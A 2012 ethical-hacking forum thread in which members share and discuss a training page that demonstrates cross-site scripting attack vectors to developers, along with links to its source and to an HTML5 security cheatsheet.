.

XSS testing grounds for developer demonstration

<<

noghost

Newbie
Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Sat Sep 08, 2012 12:31 pm

XSS testing grounds for developer demonstration

A little page I whipped up to teach developers about some simple XSS attack vectors.  Figured I'd share.

It can be a little quarky because of caching.

www.g-rawkz.com/xss.php
<<

cyber.spirit

User avatar

Sr. Member
Sr. Member

Posts: 356

Joined: Sun Feb 26, 2012 8:07 am

Location: in your heart!

Post Sat Sep 08, 2012 9:01 pm

Re: XSS testing grounds for developer demonstration

good tutorial thanx
ICS Academy Network Security Certified
<<

rance

User avatar

Full Member
Full Member

Posts: 212

Joined: Thu Jan 03, 2008 5:24 pm

Location: Earth

Post Mon Sep 10, 2012 4:45 pm

Re: XSS testing grounds for developer demonstration

That's really handy... and... I was just about to whip something like that up for a demo that i'm giving, but you hit all the points i need. Could i trouble you for your source?
Poking at security since 1986.  +++ATH
<<

noghost

Newbie
Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Mon Sep 10, 2012 8:02 pm

Re: XSS testing grounds for developer demonstration

Sure.  It is not very clean, but of course it was never really meant to be. 
Its pretty much all php other than some javascript use to remember the scroll bar location via cookie so that when you hit a submit button the page refreshes and stays at the same scroll location.

You could always give me a shout out in the demo =].  Nothing like throwing up some handles from a hacker forum on the screen during some corporate presentation.

http://www.g-rawkz.com/xss.txt
<<

rance

User avatar

Full Member
Full Member

Posts: 212

Joined: Thu Jan 03, 2008 5:24 pm

Location: Earth

Post Wed Sep 12, 2012 1:43 am

Re: XSS testing grounds for developer demonstration

it does the trick! i'll see if i can slip in a nod... :)

btw, welcome to the forum... very helpful first post!

all hail hypnotoad. <clap>
Poking at security since 1986.  +++ATH
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Sat Sep 15, 2012 11:23 am

Re: XSS testing grounds for developer demonstration

2nd on the great first post and welcome to EH-Net.

Don
CISSP, MCSE, CSTA, Security+ SME
<<

noghost

Newbie
Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Sat Sep 15, 2012 11:56 am

Re: XSS testing grounds for developer demonstration

Thanks for the welcomes.  EH seems like a pretty good forum that somehow I never stumbled upon until now.

Also any suggestions on how this page could be improved are welcomed.  Although XSS is a fairly old problem, in my experience I find it all over the place in the applications put out at my place of business and across web in general.  Even with certain filters protecting against stealing session cookies by stopping harmful tags like script and iframe, I have demonstrated how its possible to deface a webpage overlaying login forms that submit to my controlled server.  Not all XSS can lead to something evil, but there are many creative ways they can be used and I see it as a major problem especially when used as a spear phish attack via email.

'all glory to the hypnotoad'
<<

Jamie.R

User avatar

Sr. Member
Sr. Member

Posts: 435

Joined: Mon Aug 06, 2012 9:57 am

Location: UK

Post Mon Sep 17, 2012 3:35 am

Re: XSS testing grounds for developer demonstration

Speaking os XSS does anyone know a good resource for using html 5 tags to exploit XSS??
| OSWP | eCPPT Silver and Gold | eWPT |

I'm an InterN0T'er
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Mon Sep 17, 2012 4:22 am

Re: XSS testing grounds for developer demonstration

Take a look at the HTML5 Security Cheatsheet.
<<

m0wgli

User avatar

Sr. Member
Sr. Member

Posts: 308

Joined: Fri Jul 20, 2012 3:34 pm

Post Mon Sep 17, 2012 5:11 am

Re: XSS testing grounds for developer demonstration

aweSEC wrote:Take a look at the HTML5 Security Cheatsheet.


I just thought it worth mentioning that the above resource can also be accessed from the following link as well:

http://html5security.org/
Security + | OSWP | eCPPT (Silver & Gold) | CSTA

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software